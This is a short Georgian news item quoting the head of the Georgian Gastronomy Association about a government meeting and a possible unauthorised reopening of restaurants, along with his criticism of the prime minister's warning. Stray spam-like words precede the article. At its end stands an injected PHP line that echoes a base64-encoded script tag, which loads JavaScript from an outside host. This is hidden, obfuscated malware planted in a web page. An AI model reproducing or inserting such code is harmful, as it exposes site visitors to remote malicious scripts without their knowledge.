celsiusi
ავერსი შნაიდერი
"ამ ეტაპზე ჩვენ ველოდებით 16:00 საათზე მთავრობის კანცელარიაში შეხვედრას, სადაც დაგვიძახეს რესტორატორები და ასოციაციის წარმომადგენლები. შეხვედრისას, ვფიქრობთ გაგვაცნობენ რეგულაციებს, რის შედეგაც მივიღებთ გადაწყვეტილებას შაბათს თვითნებურად გავიხსნებით თუ არა", - ამის შესახებ "ბიზნესთაიმს" საქართველოს გასტრონომიის ასოციაციის ხელმძღვანელმა ლევან ქოქიაშვილმა განუცხადა. 
 
ლევან ქოქიაშვილი დღეს პრემიერ-მინისტრის გიორგი გახარიას მიერ გაკეთებული განცხადებაც შეაფასა, რომლის თანახმად ის ორგანიზაციებს, რომლებიც "კანონის დარღვევას მიზანმიმართულად გეგმავენ" მკაცრად აფრთხილებს.
 
"ამ განცხადებას ვაფასებ უარყოფითად, ბატონ პრემიერ მინისტრს მოვუწოდებ, რომ ისედაც გაღატაკებულ ხალხს ნუ ემუქრება. ახლა არ არის მუქარის დრო", - აღნიშნა "ბიზნესთაიმთან" საუბრისას ლევან ქოქიაშვილმა. 
 
1548
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");